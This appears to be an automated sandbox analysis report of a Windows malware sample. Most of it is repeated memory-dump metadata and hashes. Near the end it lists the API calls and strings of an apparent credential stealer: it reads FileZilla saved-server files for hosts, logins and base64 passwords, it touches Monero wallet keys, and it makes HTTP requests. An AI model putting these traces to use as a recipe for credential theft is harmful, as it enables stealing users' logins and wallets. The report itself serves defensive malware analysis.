                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 26d8d2ae4e568a8ec3b521cbc989b123bf3a712707c6118c15fd7e709e12f4fc
                  • Instruction ID: e2c1761f6a1a9b2bb92cb4076c79f761b7720704722378e1f4b9c9be8df1ba87
                  • Opcode Fuzzy Hash: 26d8d2ae4e568a8ec3b521cbc989b123bf3a712707c6118c15fd7e709e12f4fc
                  • Instruction Fuzzy Hash: 677103F3D082109BE314AE2DD84536AFBE5EF94720F1B893DEAC993784E9355C4486C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 728be585ac110ef61495a5ae9f44ac81814e3731a346c08a62b4967c7c75e028
                  • Instruction ID: 1242ac342e5d3d25561a42ba96bdc13928107c9f4a87062fb1b61afca4968431
                  • Opcode Fuzzy Hash: 728be585ac110ef61495a5ae9f44ac81814e3731a346c08a62b4967c7c75e028
                  • Instruction Fuzzy Hash: 496138F3A083045FF3146E29EC8577AFBD6EBD4310F2A863DDAC447784E97958098296
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c19c41f0ecd5d4ef52d89774c8b572e70041068db59c2551493087ef84628558
                  • Instruction ID: 16cce31aab4d63647c69c44702a629a1cc0cc143e858221f91a9a20ce029c4be
                  • Opcode Fuzzy Hash: c19c41f0ecd5d4ef52d89774c8b572e70041068db59c2551493087ef84628558
                  • Instruction Fuzzy Hash: BD5108F3A0C2046FF341AA2DEC8477AB7D9EBD4360F1A853DE6C4C3744E93958158692
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 895f41e430784629317b7a0281af3ebceb393535d13fc5e249cd6abfc1c41cf7
                  • Instruction ID: 445a85bc110ec5c4f4db4746a5e560d142a41b0596baf5d95a246f4c1ca87d5a
                  • Opcode Fuzzy Hash: 895f41e430784629317b7a0281af3ebceb393535d13fc5e249cd6abfc1c41cf7
                  • Instruction Fuzzy Hash: D25157F3E055044BF7005D39DC487BABB97DBD4320F2B853DDA8487784ED79990A8282
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9eafedb807c6195f28d694e7b3e127147cca7b83055f8516bc09869cf28695c6
                  • Instruction ID: 7b69f5c4360ff36b7d6d498832e9d1e83d28671c0ff12393ab259cd58b861d7d
                  • Opcode Fuzzy Hash: 9eafedb807c6195f28d694e7b3e127147cca7b83055f8516bc09869cf28695c6
                  • Instruction Fuzzy Hash: 0E51E6B250EB44DFD300AE1ACC9963AB7E6EF94718F36482DE6C787340E63098529747
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 82234411121757cef86c69e23ef163ac8fbd2aaadf9316c9bcba9fdf773f747b
                  • Instruction ID: 85c2c6cc87d7bb881176357c6553384c50a97f9dca895af2151b40dbd7dcb4b6
                  • Opcode Fuzzy Hash: 82234411121757cef86c69e23ef163ac8fbd2aaadf9316c9bcba9fdf773f747b
                  • Instruction Fuzzy Hash: FE4148F3A182145BF308AA29DC4177BB7DAEBD0720F1AC53DE9C593B44D9395C028683
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2b4a598530f41ec0e40e96c00b892618f9fa019055aed73a6dbe94b091626137
                  • Instruction ID: bef3b76df92bd5a5be2b9c4dda7c14adb7f98d048302c305cfa31437cb43836b
                  • Opcode Fuzzy Hash: 2b4a598530f41ec0e40e96c00b892618f9fa019055aed73a6dbe94b091626137
                  • Instruction Fuzzy Hash: 6741EBB3B0C2045FF300AA69EC44B7BB7DAEBD4720F16853DE584C7740EE7998058656
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 83da5ae05401ce691a1e27998ee501f91eb4b05236dc97fe5154727d656cac4f
                  • Instruction ID: 09194e2b1d8b8f9df305a975204a3443472308e67e59f31b86bff8d8e0c7010b
                  • Opcode Fuzzy Hash: 83da5ae05401ce691a1e27998ee501f91eb4b05236dc97fe5154727d656cac4f
                  • Instruction Fuzzy Hash: 0F418BB3E041148BE7085E3EDD1937ABA96ABC4320F2B463DDAD597380D939090A8792
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002B8E0B
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A99EC
                    • Part of subcall function 002A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002A9A11
                    • Part of subcall function 002A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002A9A31
                    • Part of subcall function 002A99C0: ReadFile.KERNEL32(000000FF,?,00000000,002A148F,00000000), ref: 002A9A5A
                    • Part of subcall function 002A99C0: LocalFree.KERNEL32(002A148F), ref: 002A9A90
                    • Part of subcall function 002A99C0: CloseHandle.KERNEL32(000000FF), ref: 002A9A9A
                    • Part of subcall function 002B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002B8E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,002C0DBA,002C0DB7,002C0DB6,002C0DB3), ref: 002B0362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B0369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 002B0385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B0393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 002B03CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B03DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 002B0419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B0427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 002B0463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B0475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B0502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B0532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 002B0562
                  • lstrcat.KERNEL32(?,profile: null), ref: 002B0571
                  • lstrcat.KERNEL32(?,url: ), ref: 002B0580
                  • lstrcat.KERNEL32(?,00000000), ref: 002B0593
                  • lstrcat.KERNEL32(?,002C1678), ref: 002B05A2
                  • lstrcat.KERNEL32(?,00000000), ref: 002B05B5
                  • lstrcat.KERNEL32(?,002C167C), ref: 002B05C4
                  • lstrcat.KERNEL32(?,login: ), ref: 002B05D3
                  • lstrcat.KERNEL32(?,00000000), ref: 002B05E6
                  • lstrcat.KERNEL32(?,002C1688), ref: 002B05F5
                  • lstrcat.KERNEL32(?,password: ), ref: 002B0604
                  • lstrcat.KERNEL32(?,00000000), ref: 002B0617
                  • lstrcat.KERNEL32(?,002C1698), ref: 002B0626
                  • lstrcat.KERNEL32(?,002C169C), ref: 002B0635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: b7bf2dad6185a7492dd571bda3754f5f7a2fb75afcbba2bc38062eedd218510a
                  • Instruction ID: 193693182a9486250cc3f848b4e70b6b47a19aecccfaf16ddabb7e03f2163d35
                  • Opcode Fuzzy Hash: b7bf2dad6185a7492dd571bda3754f5f7a2fb75afcbba2bc38062eedd218510a
                  • Instruction Fuzzy Hash: 31D11D71920208ABCB04FBF4DD96EEE7778FF15340F544518F102A6092DE74AA66CF66
                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002A4839
                    • Part of subcall function 002A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002A4849
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002A59F8
                  • StrCmpCA.SHLWAPI(?,00D5FCE0), ref: 002A5A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002A5B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00D5FD10,00000000,?,00D5E950,00000000,?,002C1A1C), ref: 002A5E71
                  • lstrlen.KERNEL32(00000000), ref: 002A5E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 002A5E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002A5E9A
                  • lstrlen.KERNEL32(00000000), ref: 002A5EAF
                  • lstrlen.KERNEL32(00000000), ref: 002A5ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002A5EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 002A5F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002A5F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 002A5F4C
                  • InternetCloseHandle.WININET(00000000), ref: 002A5FB0
                  • InternetCloseHandle.WININET(00000000), ref: 002A5FBD
                  • HttpOpenRequestA.WININET(00000000,00D5FCD0,?,00D5F350,00000000,00000000,00400100,00000000), ref: 002A5BF8
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • InternetCloseHandle.WININET(00000000), ref: 002A5FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
